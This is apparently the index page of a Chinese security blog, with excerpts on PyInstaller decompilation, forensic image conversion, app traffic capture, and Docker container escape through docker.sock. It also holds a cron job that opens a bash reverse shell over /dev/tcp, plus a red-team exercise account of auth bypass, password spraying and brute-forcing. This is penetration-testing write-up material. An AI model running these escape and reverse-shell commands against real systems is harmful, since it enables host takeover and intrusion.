Putdownd’s Blog

准备 python环境 使用软件: pyinstxtractor.py pycdc / uncompyle6 exe反编译到pyc 判断,这个图标是py打包的程序 使用pyinstxtractor.py来反编译exe 在运行的文件下会得到一个文件夹,文件内会有个同名的pyc后缀的文件(遇到过不是同名的自行判断) pyc到源码在线工具 https://rivers.chaitin.cn/tools/pyc2py https://tool.lu/pyc/ https://www.lddgo.net/string/pyc-compile-decompile 工具 可使用的工具有pycdc / uncompyle6 使用过程中uncompyle6有许多奇奇怪怪的报错,pycdc会比较省事但需要手动编译(参考上篇文章) 使用pycdc来还原,和上面在线大的代码是一样的,还原成功

环境配置 vscode 这个就不用多说了 安装cmake插件 gcc环境 下载: https://winlibs.com/ 配置环境变量 pycdc 源码: https://github.com/zrax/pycdc.git 编译 下载pycdc源码 使用vscode打开,安装插件 按ctrl+shift+p 选择gcc编译,编译完成

衔接上文 上一篇文章是吧E01的镜像转换为了vmdk格式,并在虚拟机进行了挂载 今天是把镜像实在虚拟机里面完整跑起来 准备工作 vmdk格式的镜像文件 vmware虚拟机啊 开始 首先新建虚拟机,选择自定义 默认下一步 稍后安装 看恢复的系统,这次是windows就选择了windows 自定义名称路径 固件类型选在bios 按需配置cpu及内存 因为是镜像恢复就不联网了 控制器类型,默认 磁盘类型scsi 使用现有的虚拟机 选择要跑的vmdk文件 保持现有格式 完成 结束 最近有点老年痴呆,简单记录下过程

镜像文件恢复前期准备工作 需要恢复的文件为 E01格式的文件,是 EnCase的压缩格式,一般用于取证 使用工具: qemu ftk image vmware wmware已经运行的win10 踩坑点: qemu无法识别 E01格式的文件无法直接转换,需要 ftk image来转换 E01转换为RAW 使用ftk image来转换文件 文件 使用 ftk image 导入 添加进来后能看镜像内的到系统文件 然后导出文件为 raw格式 填入要出的文件地址和文件名,文件大小 1500建议改为 0,会是一整个文件,不然会变成好多个文件不便于使用 qemu来恢复 经过漫长的等待就导出成功了 RAW转换VMDK qume转raw为vmdk 一行命令 1qemu-img.exe convert -p -O vmdk "转换前的文件" "转换后的文件" 1qemu-img.exe convert -p -O vmdk "ftk转换的raw的镜像" "001.vmdk&qu...

Windows搭建环境 若依源码：https://codeload.github.com/yangzongzhuan/RuoYi/zip/refs/tags/v4.5.0 工具：IDEA Ultimate phpstudy（mysql） java1.8 navicat（数据库连接工具） mysql配置 使用phpstudy内的环境 设置允许远程访问mysql数据库 执行以下命令可使用navicat进行连接 12345use mysql; grant all privileges on *.* to root@'%' identified by '密码';flush privileges; 导入数据库 新建数据库ry 运行源码内的两个sql文件，两个都要导入 导入后为以下表 IDEA Ultimate 使用idea打开若依的源码文件 修改数据库连接文件 打开个选项设置 点击运行 等等就运行起来了，默认在80端口 一些设置shiro key的位置 首页密码自动填充问题 直接删除value的值即可 漏洞测试 使用...

app抓包 模拟器：雷电模拟器（安卓7.1） 抓包工具：sunny抓包工具、burpsuite 模拟器设置 打开root模式 安装证书，未安装证书的话抓取https的网站会显示不是私密链接 下载后在模拟器内安装，点击设置证书 sunny添加模拟器 再次访问https网站，发现不会报错可正常抓包 app测试 WX小程序 拦截进程 sunny联动burpsuite 设置上游网关为burpsuite的代理即可

报错信息： 1docker: Error response from daemon: Get "https://registry-1.docker.io/v2/": proxyconnect tcp: dial tcp 192.168.88.172:7897: connect: connection refused. 12docker imagesdocker save -o alpine_latest.tar alpine:latest 导入镜像逃逸 在要逃逸的容器内执行 下载制作好的镜像 1curl http://192.168.x.x:8000/alpine_latest.tar -o /tmp/alpine_latest.tar 1/tmp/docker/docker load -i /tmp/alpine_latest.tar 1/tmp/docker/docker -H unix:///run/docker.sock run -v /:/mnt -it alpine sh 成功逃逸

前言 1docker -H unix:///run/docker.sock run -v /:/test -it ubuntu:latest /bin/bash 1Get "https://registry-1.docker.io/v2/": context deadline exceeded (Client.Timeout exceeded while awaiting headers) Portainer 的后渗透 更换镜像源 新建容器 逃逸 1echo '* * * * * bash -i >& /dev/tcp/ip/4000 0>&1' >> /test/var/spool/cron/root 结束

前言 因为参加了上一届的护网，大致知道本届的一些流程情况 比赛持续十天共抽取三个目标，完成目标后形成报告去裁判评分，进行排名 过程目标一 该目标为供应链公司，为名下企业提供技术支持 裁判认定为打穿 外网 在外网信息收集阶段发现重要系统：nacos 、xxl-job、minio 通过nacos权限认证绕过导出配置，在配置文件发现xxl-job、minio账号密码 在minio内发现该公司相关文件，并找到与员工相关文件得到工号信息 使用工号爆破sso，设置密码为123456，成功找到一些账户并使用公司的导航主页，比较重要的系统是企业邮箱为后续埋下伏笔 内网 内网入口为xxl-job反弹shell 通过入口开始扫描和搭建代理 通过fscan对内网进行扫描找到一些ssh、数据库弱口令等常规扫描信息 在zabbix的数据库内发现有运维的邮箱和密码，登陆后可以看到与下属公司的邮件往来，并发现该公司的"祖传密码" 通过收集到密码组成密码本对该公司内网的ssh和数据库进行爆破共找到约200台可连接的linux 在数据库找到和sso相关的表，通过解密对一些主要人员的账号进...

docker 保存命令把镜像保存为本地文件 1234docker tag cd80881c4e0e rabbitmq:localdocker save tophant/arl -o arl.tardocker save mongo -o mongo.tardocker save rabbitmq -o rabbitmq.tar 修改docker-compose.yml的文件 主要修改： tophant/arl:${ARL_VERSION:-latest} 改为 image: tophant/arl:local 以此类推。 以下为修改后。 1docker load < rabbitmq.tar 创建文件 1docker volume create arl_db 启动 注意 数据不会保留 及时更改密码